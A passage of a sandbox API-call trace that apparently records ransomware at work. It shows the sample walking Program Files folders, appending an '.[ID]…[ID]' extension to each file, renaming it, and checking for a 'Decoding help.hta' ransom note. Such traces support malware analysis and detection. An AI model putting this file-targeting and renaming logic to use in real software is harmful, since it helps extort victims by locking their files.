Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" [0060.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.886] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb33bc6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb33bc6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_postage_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.886] lstrcpyW (in: lpString1=0x2a7302b8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.886] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.886] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0060.886] lstrlenW (lpString="rectangle_postage_Thumbnail.bmp") returned 31 [0060.886] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_postage_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" [0060.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" [0060.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.887] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_scrapbook_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.887] lstrcpyW (in: lpString1=0x2a7302b8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.887] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0060.887] lstrlenW (lpString="rectangle_scrapbook_Thumbnail.bmp") returned 33 [0060.887] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.887] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_scrapbook_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" [0060.887] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" [0060.887] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.889] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_specialocc_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.889] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.889] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.889] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0060.889] lstrlenW (lpString="rectangle_specialocc_Thumbnail.bmp") returned 34 [0060.889] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.889] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.889] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_specialocc_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" [0060.889] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" [0060.890] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.890] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_travel_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.890] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.890] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.890] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.890] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_travel_Thumbnail.bmp") returned -1 [0060.890] lstrlenW (lpString="rectangle_travel_Thumbnail.bmp") returned 30 [0060.890] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.890] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.890] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_travel_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" [0060.890] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" [0060.890] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.890] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_widescreen_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.890] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.891] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0060.891] lstrlenW (lpString="rectangle_widescreen_Thumbnail.bmp") returned 34 [0060.891] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_widescreen_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" [0060.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" [0060.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0060.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.891] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResizingPanels", cAlternateFileName="RESIZI~1")) returned 1 [0060.891] lstrcmpW (lpString1=".", lpString2="ResizingPanels") returned -1 [0060.891] lstrcmpW (lpString1="..", lpString2="ResizingPanels") returned -1 [0060.891] lstrcmpiW (lpString1="windows", lpString2="ResizingPanels") returned 1 [0060.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="ResizingPanels" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" [0060.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*.*" [0060.891] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0060.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a02e60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0063.846] CloseHandle (hObject=0x2f4) returned 1 [0063.846] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e91e8b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e91e8b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="scene_button_style_default_Thumbnail.bmp", cAlternateFileName="")) returned 1 Thread: id = 401 os_tid = 0xb0c [0044.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*", lpFindFileData=0x19c5fd30 | out: lpFindFileData=0x19c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e27f0 [0047.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.545] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x19c5fd30 | out: lpFindFileData=0x19c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.545] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.545] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x19c5fd30 | out: lpFindFileData=0x19c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0047.545] lstrcmpW (lpString1=".", lpString2="Fonts") returned -1 [0047.545] lstrcmpW (lpString1="..", lpString2="Fonts") returned -1 [0047.545] lstrcmpiW (lpString1="windows", lpString2="Fonts") returned 1 [0049.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*" [0049.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*") returned 67 [0049.104] lstrcatW (in: 